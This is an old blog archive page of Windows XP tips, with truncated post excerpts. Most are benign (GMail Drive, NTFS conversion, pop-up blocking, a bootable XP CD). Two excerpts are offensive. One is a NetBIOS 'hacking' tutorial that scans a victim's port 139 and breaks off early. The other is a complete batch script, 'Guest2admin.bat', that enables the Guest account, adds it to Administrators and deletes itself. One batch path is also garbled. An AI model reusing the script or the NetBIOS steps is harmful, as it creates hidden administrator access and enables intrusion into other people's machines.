Archive for the ‘XP’ Category
Tuesday, August 5th, 2008
GMail Drive is a Shell Namespace Extension that creates a virtual filesystem around your Google GMail account, allowing you to use GMail as a storage medium. GMail Drive creates a virtual filesystem on top of your Google GMail account and enables you to save and retrieve files stored on your GMail account directly from inside [...]
Posted in HE-Exclusive, Tips and Tricks, Windows, XP | No Comments »
Tuesday, July 29th, 2008
When you use internet, you are connected to millions of PC’s out there. And each PC have its own unique address known as Static IP Address. This gives your identification by locality.
Without a firewall, on a typical computer, even if well maintained, a remote person will still be able to know that the communication effort [...]
Posted in Amol Wagh, Ethical hacking, Hacking, Network Security, Tips and Tricks, Vista, Windows, XP | No Comments »
Tuesday, July 29th, 2008
Follow The steps to block Pop up banners by changing settings in Internet Explorer.
1) Go to TOOLS and then INTERNET OPTIONS.
2) Click the SECURITY tab, move the slider up to HIGH and click APPLY.
This applies the highest security settings to IE, which blocks EVERYTHING, including JavaScript, Applets, and so on that pop-ups are based upon.
The [...]
Posted in General, Tutorials, Vista, Windows, XP | No Comments »
Sunday, July 27th, 2008
Open a dos prompt and type the command
convert d: /fs:NTFS
This command would convert your d: drive to NTFS
If the system cannot lock the drive, you will be prompted to convert it during next reboot.
Normally you should select yes.
Conversion from fat/fat32 to NTFS is non-destructive, your data on the drive will NOT be lost.
Be aware that [...]
Posted in Amol Wagh, Ethical hacking, General, Registry, Tips and Tricks, Tutorials, Vista, Windows, XP | No Comments »
Saturday, July 26th, 2008
1. Open notepad.exe, type “del c:windowsprefetch tosboot-*.* /q” (without the quotes) & save as “ntosboot.bat” in c:
2. From the Start menu, select “Run…” & type “gpedit.msc”.
3. Double click “Windows Settings” under “Computer Configuration” and double click again on “Shutdown” in the right window.
4. In the new window, click “add”, “Browse”, locate your “ntosboot.bat” file & [...]
Posted in Amol Wagh, Tips and Tricks, XP | No Comments »
Friday, June 6th, 2008
How to create a bootable Windows XP SP1 CD (Nero):
Tip :You can replace XP SP1 with SP2 and 3 as mentioned in disk files.
Step 1
Create 3 folders - C:\WINXPSP1, C:\SP1106 and C:\XPBOOT
Step 2
Copy the entire Windows XP CD into folder C:\WINXPSP1
Step 3
You will have to download the SP1 Update, which is 133MB.
Rename the Service Pack [...]
Posted in General, Tutorials, Vista, Windows, XP | 1 Comment »
Sunday, June 1st, 2008
Well one of the famous, easy and easy to understand type of hacking is Net Bios. You can play with it as follows.
Disclaimer: We don’t take any responsibility for Illegal use of this tutorial.
Step 1
Get a IP (range) scanner. (superscanner is a fast one, get it here).
Scan the victim’s ip on TCP/IP port 139 (More [...]
Posted in Amol Wagh, Ethical hacking, Hacking, Tutorials, Vista, Windows, XP | 1 Comment »
Sunday, March 23rd, 2008
HaCk “GUEST” with Admin privileges……..
echo off
title Please wait…
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Copy this to notepad and save the file as “Guest2admin.bat”
then u can double click the file to execute or run in the cmd.
it works…
[...]
Posted in Amol Wagh, Ethical hacking, Windows, XP | No Comments »